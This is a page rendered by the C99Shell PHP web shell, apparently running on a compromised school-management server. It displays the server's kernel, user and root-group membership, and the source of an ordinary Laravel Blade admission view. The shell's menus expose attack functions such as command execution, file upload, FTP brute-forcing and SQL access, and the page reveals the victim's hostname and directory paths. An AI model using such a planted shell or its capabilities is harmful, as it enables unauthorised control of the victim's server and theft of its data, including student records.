!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/school.picotech.app/public_html/resources/views/admin/offline_admission/   drwxr-xr-x
Free 29.35 GB of 117.98 GB (24.88%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     offline_admission.blade.php (3.51 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('admin.navigation')
   
@section('content')
<div class="mainSection-title">
    <div class="row">
      <div class="col-12">
        <div
          class="d-flex justify-content-between align-items-center flex-wrap gr-15"
        >
          <div class="d-flex flex-column">
            <h4>{{ get_phrase('Admission') }}</h4>
            <ul class="d-flex align-items-center eBreadcrumb-2">
              <li><a href="#">{{ get_phrase('Home') }}</a></li>
              <li><a href="#">{{ get_phrase('Admissions') }}</a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
</div>

<div class="user-profile-area d-flex flex-wrap">
  <!-- Right side -->
  <div class="user-details-info">
    <!-- Tab label -->
    <ul
     class="nav nav-tabs eNav-Tabs-custom"
     id="myTab"
     role="tablist"
     >
      <li class="nav-item" role="presentation">
          <a href="{{ route('admin.offline_admission.single', ['type' => 'single']) }}">
              <button
              class="nav-link {{ $aria_expand == 'single' ? 'active':'' }}"
              id="basicInfo-tab"
              data-bs-toggle="tab"
              data-bs-target="#basicInfo"
              type="button"
              role="tab"
              aria-controls="basicInfo"
              aria-selected="true"
            >
              Single student admission
              <span></span>
          </button>
          </a>
      </li>
      <li class="nav-item d-none" role="presentation">
        <a href="{{ route('admin.offline_admission.single', ['type' => 'bulk']) }}">
              <button
              class="nav-link {{ $aria_expand == 'bulk' ? 'active':'' }}"
              id="attendance-tab"
              data-bs-toggle="tab"
              data-bs-target="#attendance"
              type="button"
              role="tab"
              aria-controls="attendance"
              aria-selected="false"
            >
              {{ get_phrase('Bulk student admission') }}
              <span></span>
          </button>
          </a>
      </li>
      <li class="nav-item" role="presentation">
          <a href="{{ route('admin.offline_admission.single', ['type' => 'excel']) }}">
              <button
              class="nav-link {{ $aria_expand == 'excel' ? 'active':'' }}"
              id="attendance-tab"
              data-bs-toggle="tab"
              data-bs-target="#attendance"
              type="button"
              role="tab"
              aria-controls="attendance"
              aria-selected="false"
            >
              {{ get_phrase('Excel upload') }}
              <span></span>
          </button>
          </a>
      </li>
      </ul>
    <!-- Tab content -->
    <div class="tab-content eNav-Tabs-content" id="myTabContent">
      <div
        class="tab-pane fade show active"
        id="basicInfo"
        role="tabpanel"
        aria-labelledby="basicInfo-tab"
      >
        @if($aria_expand == 'single')
                    @include('admin.offline_admission.single_student_admission')
                @elseif($aria_expand == 'bulk')
                    @include('admin.offline_admission.bulk_student_admission')
                @else
                    @include('admin.offline_admission.excel_student_admission')
                @endif
      </div>
    </div>
  </div>
</div>
@endsection

<script type="text/javascript">

  "use strict";

    function classWiseSection(classId) {
        let url = "{{ route('admin.class_wise_sections', ['id' => ":classId"]) }}";
        url = url.replace(":classId", classId);
        $.ajax({
            url: url,
            success: function(response){
                $('#section_id').html(response);
            }
        });
    }
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--